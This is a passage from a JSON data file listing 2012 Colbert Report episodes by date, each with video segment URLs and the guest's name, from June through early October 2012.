        "http://thecolbertreport.cc.com/videos/clm6h7/the-enemy-within---apes-armed-with-ipads",
        "http://thecolbertreport.cc.com/videos/0nbwzv/gregg-allman",
        "http://thecolbertreport.cc.com/videos/0bcb4l/sign-off---goodnight"
      ],
      "guest": "Gregg Allman"
    },
    {
      "date": "2012-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wdhef3/marijuana-legalization-as-election-hot-button-issue",
        "http://thecolbertreport.cc.com/videos/zy2va1/super-pac-super-cash---24-hour-political-ad-channels",
        "http://thecolbertreport.cc.com/videos/a5uuwa/cheating-death---penis-curvature-cures---single-women-sleep-aids",
        "http://thecolbertreport.cc.com/videos/jylspq/steve-coll",
        "http://thecolbertreport.cc.com/videos/nw9c2r/sign-off---bon-voyage--peter-gwinn"
      ],
      "guest": "Steve Coll"
    },
    {
      "date": "2012-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/34ngb2/intro---6-18-12",
        "http://thecolbertreport.cc.com/videos/c3nu3d/barack-obama-s-immigration-policy-change",
        "http://thecolbertreport.cc.com/videos/z9bjae/press-interruption-at-barack-obama-s-immigration-address",
        "http://thecolbertreport.cc.com/videos/f3coxy/operation-artificial-swedener---sweden-s-response",
        "http://thecolbertreport.cc.com/videos/x4uwku/paul-krugman",
        "http://thecolbertreport.cc.com/videos/fdw0ht/sign-off---goodnight"
      ],
      "guest": "Paul Krugman"
    },
    {
      "date": "2012-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0r91gj/john-kerry-as-mitt-romney-in-debate-prep",
        "http://thecolbertreport.cc.com/videos/zxypkl/mitt-romney-s-champion-horse---dressage-tribute",
        "http://thecolbertreport.cc.com/videos/ugscr4/unscooped-dog-poop-crimes",
        "http://thecolbertreport.cc.com/videos/xdevam/olivia-wilde",
        "http://thecolbertreport.cc.com/videos/kada0a/sign-off---stephen-s-dressage-dance"
      ],
      "guest": "Olivia Wilde"
    },
    {
      "date": "2012-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6q5qvo/intro---6-20-12",
        "http://thecolbertreport.cc.com/videos/w6vibi/asian-immigration-threat",
        "http://thecolbertreport.cc.com/videos/95tn0n/unraveling-the-operation-fast---furious-scandal",
        "http://thecolbertreport.cc.com/videos/b65og2/joe-the-plumber-s-controversial-gun-control-ad",
        "http://thecolbertreport.cc.com/videos/4h0l60/thought-for-food---doritos-tacos---flavorlopes",
        "http://thecolbertreport.cc.com/videos/lwb6am/daniel-klaidman",
        "http://thecolbertreport.cc.com/videos/31ptzz/sign-off---goodnight"
      ],
      "guest": "Daniel Klaidman"
    },
    {
      "date": "2012-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7r29kf/egypt-s-presidential-election---hosni-mubarak-s-health",
        "http://thecolbertreport.cc.com/videos/zdprqc/threatdown---sicko-penguins--stoner-babies---terrorist-furniture",
        "http://thecolbertreport.cc.com/videos/5yjil8/operation-artificial-swedener---c-mon-sweden--take-a-chance-on-stephen",
        "http://thecolbertreport.cc.com/videos/e6ik9l/lawrence-krauss",
        "http://thecolbertreport.cc.com/videos/e8ivor/sign-off----a-universe-from-nothing-"
      ],
      "guest": "Lawrence Krauss"
    },
    {
      "date": "2012-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ylc1ta/intro---6-25-12",
        "http://thecolbertreport.cc.com/videos/cbsvdk/colbert-news-alert---obamacare-supreme-court-ruling",
        "http://thecolbertreport.cc.com/videos/wn3vzl/colbert-news-alert---obamacare-supreme-court-ruling---richard-mourdock-s-responses",
        "http://thecolbertreport.cc.com/videos/1nhpf3/the-word---silver-maligning",
        "http://thecolbertreport.cc.com/videos/0u5f3i/i-s-on-edjukashun---study-drugs",
        "http://thecolbertreport.cc.com/videos/2q2di6/frank-deford",
        "http://thecolbertreport.cc.com/videos/wri423/sign-off---five-finger-fillet"
      ],
      "guest": "Frank Deford"
    },
    {
      "date": "2012-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ifbnsf/intro---6-26-12",
        "http://thecolbertreport.cc.com/videos/8wlx7c/supreme-court-ruling-on-arizona-immigration-policy",
        "http://thecolbertreport.cc.com/videos/06bwvh/tip-wag---pixar-s-gay-agenda--america-s-obesity---adidas-shackle-sneakers",
        "http://thecolbertreport.cc.com/videos/ohfzqq/dish-network-s-autohop-service",
        "http://thecolbertreport.cc.com/videos/r8iy26/richard-ford",
        "http://thecolbertreport.cc.com/videos/ybvbi1/sign-off---goodnight"
      ],
      "guest": "Richard Ford"
    },
    {
      "date": "2012-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g8onr9/colbert-super-pac-treasure-hunt-solution",
        "http://thecolbertreport.cc.com/videos/gl54n8/mitt-romney-s-victory-retreat---democrats--convention-deficit",
        "http://thecolbertreport.cc.com/videos/t2x64z/national-geographic-poll-on-alien-invasion-management",
        "http://thecolbertreport.cc.com/videos/td6pu4/blood-in-the-water---mike-turzai-s-voter-id-remarks",
        "http://thecolbertreport.cc.com/videos/5em8r3/rainbow-stuffed-gay-pride-oreo",
        "http://thecolbertreport.cc.com/videos/aj465n/melinda-gates",
        "http://thecolbertreport.cc.com/videos/bxvxkj/sign-off---oreo-cookie-plate"
      ],
      "guest": "Melinda Gates"
    },
    {
      "date": "2012-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/coii6k/cable-news-gaffe-on-obamacare-supreme-court-ruling",
        "http://thecolbertreport.cc.com/videos/p7wwtp/john-roberts--obamacare-swing-vote",
        "http://thecolbertreport.cc.com/videos/n5b9bc/obamacare---the-broccoli-argument",
        "http://thecolbertreport.cc.com/videos/xqmuun/obamacare---the-broccoli-argument---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/843q05/aaron-sorkin",
        "http://thecolbertreport.cc.com/videos/hdpyh9/colbert-super-pac---super-fun-pack-treasure-finder"
      ],
      "guest": "Aaron Sorkin"
    },
    {
      "date": "2012-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rkamql/intro---7-16-12",
        "http://thecolbertreport.cc.com/videos/nw0ci8/tomkat-s-divorce---anderson-cooper-s-sexual-orientation",
        "http://thecolbertreport.cc.com/videos/xmrkal/mitt-romney-s-retroactive-retirement-from-bain-capital",
        "http://thecolbertreport.cc.com/videos/hs3epw/thought-for-food---caffeine-edition---funeral-home-starbucks---car-coffee-makers",
        "http://thecolbertreport.cc.com/videos/gxb8p4/anne-marie-slaughter",
        "http://thecolbertreport.cc.com/videos/nj5kky/sign-off---smiles-or-whatever"
      ],
      "guest": "Anne-Marie Slaughter"
    },
    {
      "date": "2012-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5r1yvx/nevada-s--none-of-the-above--is-fearsome-foe-for-gop",
        "http://thecolbertreport.cc.com/videos/577ry9/the-word---on-the-straight---narrow-minded",
        "http://thecolbertreport.cc.com/videos/xrrg9u/who-s-honoring-me-now----philadelphia-s-rosenbach-museum-and-library",
        "http://thecolbertreport.cc.com/videos/8qe1km/nas"
      ],
      "guest": "Nas"
    },
    {
      "date": "2012-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xiottz/intro---7-18-12",
        "http://thecolbertreport.cc.com/videos/jhpgom/-struggling--waiters---waitresses-at-mitt-romney-s-fundraiser",
        "http://thecolbertreport.cc.com/videos/40x15i/tip-wag---christian-tablet-computer---rock-paper-scissors-robot",
        "http://thecolbertreport.cc.com/videos/5qgquz/stephen-colbert-s-metunes---def-leppard-s--forgeries--of-old-hits",
        "http://thecolbertreport.cc.com/videos/67w2nh/annise-parker",
        "http://thecolbertreport.cc.com/videos/2wz88p/sign-off---goodnight"
      ],
      "guest": "Mayor Annise D. Parker"
    },
    {
      "date": "2012-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h8wtk8/fred-willard-arrested-for-lewd-conduct",
        "http://thecolbertreport.cc.com/videos/64cfhk/libor-interest-rate-scandal",
        "http://thecolbertreport.cc.com/videos/7dpxne/libor-interest-rate-scandal---dave-leonhardt",
        "http://thecolbertreport.cc.com/videos/uknspr/canada-s-economic-growth-despite-melting-currency",
        "http://thecolbertreport.cc.com/videos/xfd2bp/lisa-jackson",
        "http://thecolbertreport.cc.com/videos/iw4bs9/sign-off---goodnight"
      ],
      "guest": "Lisa Jackson"
    },
    {
      "date": "2012-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/imdi3o/intro---7-23-12",
        "http://thecolbertreport.cc.com/videos/0xmom4/interview-no-show--mike-tyson",
        "http://thecolbertreport.cc.com/videos/v7f1z0/shepard-smith-s-personal-reporting-style",
        "http://thecolbertreport.cc.com/videos/p2oill/partisan-speculation-over-colorado-shooter",
        "http://thecolbertreport.cc.com/videos/3cxwny/vikram-gandhi",
        "http://thecolbertreport.cc.com/videos/rwkf73/sign-off---goodnight"
      ],
      "guest": "Vikram Gandhi"
    },
    {
      "date": "2012-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/knsr5h/intro---7-24-12",
        "http://thecolbertreport.cc.com/videos/h74nmb/hamster-study-links-late-night-tv-with-depression",
        "http://thecolbertreport.cc.com/videos/zxif76/u-s--agriculture---drought-disaster",
        "http://thecolbertreport.cc.com/videos/x2crx4/u-s--agriculture---drought-disaster---bruce-babcock",
        "http://thecolbertreport.cc.com/videos/bov9or/james-fallows",
        "http://thecolbertreport.cc.com/videos/lpy9h0/sign-off---goodnight"
      ],
      "guest": "James Fallows"
    },
    {
      "date": "2012-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0mcg76/mitt-romney-s-anglo-saxon-connection",
        "http://thecolbertreport.cc.com/videos/w5w9pn/mitt-romney-vs--barack-obama-on-small-business-owners",
        "http://thecolbertreport.cc.com/videos/x14yw9/the-word---1-man-show",
        "http://thecolbertreport.cc.com/videos/f7r40e/bibles-swapped-for--fifty-shades-of-grey-",
        "http://thecolbertreport.cc.com/videos/4414pc/dan-gross",
        "http://thecolbertreport.cc.com/videos/e1brl1/sign-off---goodnight"
      ],
      "guest": "Dan Gross"
    },
    {
      "date": "2012-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vqlxb2/intro---7-26-12",
        "http://thecolbertreport.cc.com/videos/4fk2ow/sport-report---stephen-colbefrajilympic-expealacoverage-",
        "http://thecolbertreport.cc.com/videos/kycpil/mitt-romney-s-london-olympics-blunder",
        "http://thecolbertreport.cc.com/videos/lra5ae/chick-fil-a-s-anti-gay-marriage-announcement",
        "http://thecolbertreport.cc.com/videos/4nngh8/peter-westmacott",
        "http://thecolbertreport.cc.com/videos/ccwpvt/sign-off---colbert-nation-twins"
      ],
      "guest": "Amb. Peter Westmacott"
    },
    {
      "date": "2012-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/70ka18/mitt-romney-s-disinterest-in-dressage",
        "http://thecolbertreport.cc.com/videos/lav3uh/stephen-s-dressage-training-pt--1",
        "http://thecolbertreport.cc.com/videos/zdpacy/tony-robbins--signature-firewalk",
        "http://thecolbertreport.cc.com/videos/554xm8/joan-rivers",
        "http://thecolbertreport.cc.com/videos/d69lls/sign-off----i-hate-everyone----starting-with-me-"
      ],
      "guest": "Joan Rivers"
    },
    {
      "date": "2012-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d1pkf4/intro---7-31-12",
        "http://thecolbertreport.cc.com/videos/sbevip/rick-gorka-s-press-outburst-in-poland",
        "http://thecolbertreport.cc.com/videos/8qmv9k/rafalca-s-impact-on-mitt-romney-s-vp-pick",
        "http://thecolbertreport.cc.com/videos/f5vsty/stephen-s-dressage-training-pt--2",
        "http://thecolbertreport.cc.com/videos/lfsrga/stephest-colbchella--012---rocktaugustfest",
        "http://thecolbertreport.cc.com/videos/p9ejfs/jeff-koons",
        "http://thecolbertreport.cc.com/videos/e0ikf9/sign-off---goodnight"
      ],
      "guest": "Jeff Koons"
    },
    {
      "date": "2012-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fjidln/obama-administration-s-birth-control-mandate",
        "http://thecolbertreport.cc.com/videos/llkyw5/the--fiscal-cliff--conundrum---grover-norquist-s-tax-pledge",
        "http://thecolbertreport.cc.com/videos/u1lf6f/sport-report---stephen-colbefrajilympic-expealacoverage----gymnastics---swimming",
        "http://thecolbertreport.cc.com/videos/gayfdj/john-grunsfeld",
        "http://thecolbertreport.cc.com/videos/gwa2y4/sign-off---totem"
      ],
      "guest": "John Grunsfeld"
    },
    {
      "date": "2012-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x1we2u/exclusive---better-know-a-district---missouri-s-3rd-or-1st---russ-carnahan",
        "http://thecolbertreport.cc.com/videos/3wx6bt/rafalca-s-first-day-of-dressage",
        "http://thecolbertreport.cc.com/videos/ql0bqa/nancy-pelosi-s-bkad-pact---the-disclose-act-filibuster",
        "http://thecolbertreport.cc.com/videos/tdj576/better-know-a-district---missouri-s-3rd-or-1st---russ-carnahan",
        "http://thecolbertreport.cc.com/videos/t85slm/thought-for-food---usda-meatless-mondays---plant-communication-research",
        "http://thecolbertreport.cc.com/videos/fyzakp/chris-hayes",
        "http://thecolbertreport.cc.com/videos/m1idm3/sign-off---carrot-nibble"
      ],
      "guest": "Chris Hayes"
    },
    {
      "date": "2012-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kz6vda/intro---8-6-12",
        "http://thecolbertreport.cc.com/videos/h9qt0r/mars-rover-landing",
        "http://thecolbertreport.cc.com/videos/w2s6c0/chick-fil-a-appreciation-day",
        "http://thecolbertreport.cc.com/videos/x7yc4w/pete-seeger",
        "http://thecolbertreport.cc.com/videos/aj407y/sign-off----pete-seeger--in-his-own-words-"
      ],
      "guest": "Pete Seeger"
    },
    {
      "date": "2012-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1vt8t5/sport-report---stephen-colbefrajilympic-expealacoverage----soft-anti-americanism",
        "http://thecolbertreport.cc.com/videos/k4260i/mitt-romney-s-protective-press-pool---running-mate-clues",
        "http://thecolbertreport.cc.com/videos/q82dz5/steve-king-s-dogfighting-defense",
        "http://thecolbertreport.cc.com/videos/nlroaz/mark-shriver",
        "http://thecolbertreport.cc.com/videos/jx7y7x/sign-off---goodnight"
      ],
      "guest": "Mark Shriver"
    },
    {
      "date": "2012-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/23mkh8/intro---8-8-12",
        "http://thecolbertreport.cc.com/videos/4fqxvr/obamacare---pizza-costs",
        "http://thecolbertreport.cc.com/videos/h3tu8s/cheating-death---sensor-enabled-pills---facelift-bungee-cords",
        "http://thecolbertreport.cc.com/videos/zgmish/liza-mundy",
        "http://thecolbertreport.cc.com/videos/d5p8ok/sign-off---vacsa-strap"
      ],
      "guest": "Liza Mundy"
    },
    {
      "date": "2012-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8gpwtc/anti-muslim-attack-on-hillary-clinton-aide",
        "http://thecolbertreport.cc.com/videos/sr618c/better-know-a-district---minnesota-s-5th---keith-ellison",
        "http://thecolbertreport.cc.com/videos/zzeqj6/who-s-honoring-me-now----psychonomic-bulletin---review",
        "http://thecolbertreport.cc.com/videos/i891sf/woody-harrelson",
        "http://thecolbertreport.cc.com/videos/nynu71/sign-off---goodnight"
      ],
      "guest": "Woody Harrelson"
    },
    {
      "date": "2012-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d4650t/stephest-colbchella--012---welcome-to-rocktaugustfest",
        "http://thecolbertreport.cc.com/videos/6jv3cb/mitt-romney-s-bold-running-mate-pick",
        "http://thecolbertreport.cc.com/videos/wk9zh3/stephest-colbchella--012---fun-",
        "http://thecolbertreport.cc.com/videos/r9jxwl/sign-off---stephest-colbchella--012---t-mobile-goodnight"
      ],
      "guest": "Fun."
    },
    {
      "date": "2012-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9sxdgp/stephest-colbchella--012---rocktaugustfest-night-two",
        "http://thecolbertreport.cc.com/videos/ovgwtm/mitt-romney-s---paul-ryan-s-foreign-policy-credentials",
        "http://thecolbertreport.cc.com/videos/ajslu2/-stars-earn-stripes--reality-series",
        "http://thecolbertreport.cc.com/videos/4uk1xx/stephest-colbchella--012---grizzly-bear",
        "http://thecolbertreport.cc.com/videos/1eoihc/sign-off---stephest-colbchella--012---t-mobile-goodnight-auditions"
      ],
      "guest": "Grizzly Bear"
    },
    {
      "date": "2012-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jus7dh/exclusive---stephest-colbchella--012---concert-setup-timelapse",
        "http://thecolbertreport.cc.com/videos/lkqb8i/stephest-colbchella--012---rocktaugustfest-night-three",
        "http://thecolbertreport.cc.com/videos/iwgkv9/fierce-five-interns",
        "http://thecolbertreport.cc.com/videos/tzk5xz/stephest-colbchella--012---intrepid-sea--air---space-museum",
        "http://thecolbertreport.cc.com/videos/buxzdm/stephest-colbchella--012---santigold",
        "http://thecolbertreport.cc.com/videos/891lvk/sign-off---stephest-colbchella--012---t-mobile-goodnight-with-grandmaster-flash"
      ],
      "guest": "The U.S. Women's Olympic Gymnastics team, Santigold"
    },
    {
      "date": "2012-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bx6qnh/stephest-colbchella--012---rocktaugustfest-night-four",
        "http://thecolbertreport.cc.com/videos/tgqk3o/mitt-romney---paul-ryan---the-dynam-ish-duo",
        "http://thecolbertreport.cc.com/videos/ymbqe6/17th-amendment-under-attack",
        "http://thecolbertreport.cc.com/videos/x5cie8/stephest-colbchella--012---wayne-coyne",
        "http://thecolbertreport.cc.com/videos/ez1hov/sign-off---stephest-colbchella--012---t-mobile-goodnight-in-a-bubble"
      ],
      "guest": "The Flaming Lips"
    },
    {
      "date": "2012-08-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z0q2d6/hurricane-isaac-at-gop-convention",
        "http://thecolbertreport.cc.com/videos/2a1lg4/colbert-super-pac---hurricane-isaac---stephen-s-money-convention",
        "http://thecolbertreport.cc.com/videos/kcyg86/todd-akin-s-abortion-gaffe",
        "http://thecolbertreport.cc.com/videos/2f1kwv/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/qomrph/sign-off---goodnight"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2012-08-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ane28t/america-strikes-back---episode-ii---return-of-the-america-strikes-back--again",
        "http://thecolbertreport.cc.com/videos/std0vn/the-mitt-romney-story",
        "http://thecolbertreport.cc.com/videos/3teieb/the-mitt-romney-story---ann-romney-s-gop-convention-speech",
        "http://thecolbertreport.cc.com/videos/w1ej3a/mitt-romney-s-role-model",
        "http://thecolbertreport.cc.com/videos/n7yuw7/ayn-rand---paul-ryan",
        "http://thecolbertreport.cc.com/videos/v0fegj/jennifer-burns",
        "http://thecolbertreport.cc.com/videos/gxzmx3/sign-off---goodnight"
      ],
      "guest": "Jennifer Burns"
    },
    {
      "date": "2012-08-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0pjdyn/america-strikes-back---episode-iii---the-phantom-money",
        "http://thecolbertreport.cc.com/videos/7543m5/the-gop-convention---mitt-romney-s-minority-appeal",
        "http://thecolbertreport.cc.com/videos/vo7txi/paul-ryan-s-misleading-gop-convention-speech",
        "http://thecolbertreport.cc.com/videos/ghjrfh/jon-huntsman-pt--1",
        "http://thecolbertreport.cc.com/videos/93jjo7/jon-huntsman-pt--2",
        "http://thecolbertreport.cc.com/videos/vi4rti/sign-off---goodnight"
      ],
      "guest": "Jon Huntsman"
    },
    {
      "date": "2012-08-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x9yoif/america-strikes-back---episode-iv---a-new-ish-hope",
        "http://thecolbertreport.cc.com/videos/9czru3/mitt-romney-s--solid--gop-convention-speech",
        "http://thecolbertreport.cc.com/videos/spqhue/the-gop-convention-s-mystery-speaker",
        "http://thecolbertreport.cc.com/videos/qrijg7/the-gop-convention-s-mystery-speaker---clint-eastwood-s-chair",
        "http://thecolbertreport.cc.com/videos/cx5s7v/neil-armstrong-tribute",
        "http://thecolbertreport.cc.com/videos/n0qmbf/james-carville",
        "http://thecolbertreport.cc.com/videos/2cv31s/sign-off---goodnight"
      ],
      "guest": "James Carville"
    },
    {
      "date": "2012-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r83jxh/exclusive---better-know-a-district---new-york-s-9th---yvette-clarke",
        "http://thecolbertreport.cc.com/videos/mxucyy/the-2012-people-s-party-congress-of-charlotte",
        "http://thecolbertreport.cc.com/videos/bg56qn/better-know-a-district---new-york-s-9th---yvette-clarke",
        "http://thecolbertreport.cc.com/videos/cy97ce/paul-ryan-s-marathon-time-gaffe",
        "http://thecolbertreport.cc.com/videos/stj7xj/reihan-salam",
        "http://thecolbertreport.cc.com/videos/awwi1z/sign-off---goodnight"
      ],
      "guest": "Reihan Salam"
    },
    {
      "date": "2012-09-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4axjsp/the-2012-people-s-party-congress-of-charlotte---sound-system",
        "http://thecolbertreport.cc.com/videos/lnxbm7/the-2012-people-s-party-congress-of-charlotte---michelle-obama---tammy-duckworth",
        "http://thecolbertreport.cc.com/videos/zp0jy0/the-2012-people-s-party-congress-of-charlotte---michelle-obama-s-speech-tweets",
        "http://thecolbertreport.cc.com/videos/75ubcv/sport-report---nfl-referee-lockout",
        "http://thecolbertreport.cc.com/videos/fjhhan/michael-grunwald",
        "http://thecolbertreport.cc.com/videos/05j0ux/sign-off---goodnight"
      ],
      "guest": "Michael Grunwald"
    },
    {
      "date": "2012-09-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vf84g8/the-2012-people-s-party-congress-of-charlotte---avoiding-water-gate--day-1",
        "http://thecolbertreport.cc.com/videos/qfodha/the-2012-people-s-party-congress-of-charlotte---bill-clinton---hill-poll",
        "http://thecolbertreport.cc.com/videos/p7kw6y/the-2012-people-s-party-congress-of-charlotte---god---jerusalem",
        "http://thecolbertreport.cc.com/videos/epwrup/bill-richardson",
        "http://thecolbertreport.cc.com/videos/8ivg8l/sign-off---taco-plate"
      ],
      "guest": "Bill Richardson"
    },
    {
      "date": "2012-09-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9wdqkq/the-2012-people-s-party-congress-of-charlotte---youth-vote",
        "http://thecolbertreport.cc.com/videos/cr72mv/the-2012-people-s-party-congress-of-charlotte---tom-brokaw---barack-obama",
        "http://thecolbertreport.cc.com/videos/l9ys9b/rnc-convention-vs--dnc-convention",
        "http://thecolbertreport.cc.com/videos/6oqr0u/the-2012-people-s-party-congress-of-charlotte---colbert-bump",
        "http://thecolbertreport.cc.com/videos/oq50sl/ed-rendell",
        "http://thecolbertreport.cc.com/videos/fbd0do/sign-off---goodnight"
      ],
      "guest": "Ed Rendell"
    },
    {
      "date": "2012-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ohliey/intro---9-17-12",
        "http://thecolbertreport.cc.com/videos/q2ib3a/values-voter-summit-gaffe",
        "http://thecolbertreport.cc.com/videos/kelspo/mitt-romney-s-libya-comments",
        "http://thecolbertreport.cc.com/videos/liknzb/atone-phone---ira-glass-calls",
        "http://thecolbertreport.cc.com/videos/454q6n/drew-faust",
        "http://thecolbertreport.cc.com/videos/lh4d2v/sign-off---shofar"
      ],
      "guest": "Drew Faust"
    },
    {
      "date": "2012-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v7w7w3/intro---9-18-12",
        "http://thecolbertreport.cc.com/videos/53lqfp/logo-makeover-for-usa-today",
        "http://thecolbertreport.cc.com/videos/dsvsbf/mitt-romney-s-secret-video",
        "http://thecolbertreport.cc.com/videos/m021ol/tip-wag---apple-samsung-lawsuit---tabloid-clash",
        "http://thecolbertreport.cc.com/videos/ni1t1w/jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/qteu69/sign-off---shrimp-toss"
      ],
      "guest": "Jeffrey Toobin"
    },
    {
      "date": "2012-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8pu5um/intro---9-19-12",
        "http://thecolbertreport.cc.com/videos/yf80jg/mitt-romney-s---barack-obama-s-secret-videos",
        "http://thecolbertreport.cc.com/videos/rdsd7t/the-word---ask-not",
        "http://thecolbertreport.cc.com/videos/4yfsux/wife-of-jesus",
        "http://thecolbertreport.cc.com/videos/3vyhzj/itzhak-perlman"
      ],
      "guest": "Itzhak Perlman"
    },
    {
      "date": "2012-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8f3t3h/vladimir-putin-s-crane-flight",
        "http://thecolbertreport.cc.com/videos/asy3gz/mitt-romney-s-hispanic-outreach",
        "http://thecolbertreport.cc.com/videos/3f13ot/mitt-romney-s-hispanic-outreach---esteban-colberto",
        "http://thecolbertreport.cc.com/videos/2ufg9n/alpha-dog-of-the-week---cecilia-gimenez",
        "http://thecolbertreport.cc.com/videos/nxad9d/errol-morris",
        "http://thecolbertreport.cc.com/videos/sbgok9/sign-off---ask-o-matic"
      ],
      "guest": "Errol Morris"
    },
    {
      "date": "2012-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kke43t/intro---9-25-12",
        "http://thecolbertreport.cc.com/videos/ahsdxc/mitt-romney-s-airplane-window-gaffe",
        "http://thecolbertreport.cc.com/videos/495xja/national-journal-poll",
        "http://thecolbertreport.cc.com/videos/9vebvz/-rolling-calamity--campaign----america-again--preview",
        "http://thecolbertreport.cc.com/videos/vk8jsq/sport-report---nfl-referee-lockout---replacement-refs---ratings",
        "http://thecolbertreport.cc.com/videos/1my2a8/claressa-shields",
        "http://thecolbertreport.cc.com/videos/n6n3t7/sign-off----america-again-"
      ],
      "guest": "Claressa Shields"
    },
    {
      "date": "2012-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dfrukr/intro---9-26-12",
        "http://thecolbertreport.cc.com/videos/diooyo/yom-kippur---aporkalypse",
        "http://thecolbertreport.cc.com/videos/pnhcq0/obama-s-ottoman-empire",
        "http://thecolbertreport.cc.com/videos/kzi40s/40-days-to-save-america",
        "http://thecolbertreport.cc.com/videos/lsl385/jim-holt",
        "http://thecolbertreport.cc.com/videos/jwctvx/sign-off---turkish-delight"
      ],
      "guest": "Jim Holt"
    },
    {
      "date": "2012-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/373l0t/-america-again--re-becoming-the-greatness-we-never-weren-t-",
        "http://thecolbertreport.cc.com/videos/s9359o/mitt-romney-s-sliding-poll-numbers",
        "http://thecolbertreport.cc.com/videos/zpnkfm/-skewed--presidential-polls",
        "http://thecolbertreport.cc.com/videos/7tmsil/vince-gilligan-pt--1",
        "http://thecolbertreport.cc.com/videos/e6j3e4/vince-gilligan-pt--2",
        "http://thecolbertreport.cc.com/videos/xrnkns/sign-off----america-again-"
      ],
      "guest": "Vince Gilligan"
    },
    {
      "date": "2012-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/21ytsa/mitt-romney-s-tax-plan-math",
        "http://thecolbertreport.cc.com/videos/v5694x/the-word---supply-chained",
        "http://thecolbertreport.cc.com/videos/h64sbo/mahmoud-ahmadinejad-s-un-entourage",
        "http://thecolbertreport.cc.com/videos/k9q5kh/ben-folds-five"
      ],
      "guest": "Ben Folds Five"
    },
    {
      "date": "2012-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ujlwr/intro---10-2-12",
        "http://thecolbertreport.cc.com/videos/yeek7a/-america-again--release",
        "http://thecolbertreport.cc.com/videos/cy7c9f/pulpit-freedom-sunday",
        "http://thecolbertreport.cc.com/videos/x5r0se/pulpit-freedom-sunday---jim-garlow",
        "http://thecolbertreport.cc.com/videos/oe7wh2/debate-hype---mitt-s-strategy",
        "http://thecolbertreport.cc.com/videos/78yg26/jorge-ramos",
        "http://thecolbertreport.cc.com/videos/dictxb/sign-off----america-again--release"
      ],
      "guest": "Jorge Ramos"
    },
    {
      "date": "2012-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ef28hc/intro---10-3-12",
        "http://thecolbertreport.cc.com/videos/05md2w/presidential-debates---mitt-romney-s-re-introduction",
        "http://thecolbertreport.cc.com/videos/2cmp66/george-will-s-political-post-racial-journalism",
        "http://thecolbertreport.cc.com/videos/idoutl/cheating-death---low-t",
        "http://thecolbertreport.cc.com/videos/nw3yhm/kenny-rogers",
        "http://thecolbertreport.cc.com/videos/rt3hz7/sign-off---banana-phone"
      ],
      "guest": "Kenny Rogers"
    },
    {
      "date": "2012-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5uncqq/obama-s-debate-apathy---pbs",
        "http://thecolbertreport.cc.com/videos/cl08kb/chris-matthews-s-impotent-rage",
        "http://thecolbertreport.cc.com/videos/inrj8y/mitt-s-socialist-rhetoric---body-language",
        "http://thecolbertreport.cc.com/videos/mw7xqx/mitt-s--etch-a-sketch--behavior",
        "http://thecolbertreport.cc.com/videos/nvjrik/voter-fraud-alert---halloween---pennsylvania",
        "http://thecolbertreport.cc.com/videos/fkt99i/george-church",
        "http://thecolbertreport.cc.com/videos/8vqy9e/sign-off---rabbit-food"
      ],
      "guest": "Dr. George Church"
    },
    {
      "date": "2012-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ohtrd9/intro---10-8-12",
        "http://thecolbertreport.cc.com/videos/53brnc/unemployment-below-eight-percent",
        "http://thecolbertreport.cc.com/videos/uey9b0/the-word---it-s-not-easy-having-green",
        "http://thecolbertreport.cc.com/videos/s8mn29/koch-brothers---orc-senate-candidate",
        "http://thecolbertreport.cc.com/videos/43khod/mark-kelly",
        "http://thecolbertreport.cc.com/videos/sq2eio/sign-off---welcome-baby-brumm-"
      ],
      "guest": "Mark Kelly"
    },
    {
      "date": "2012-10-09",
      "videos": [
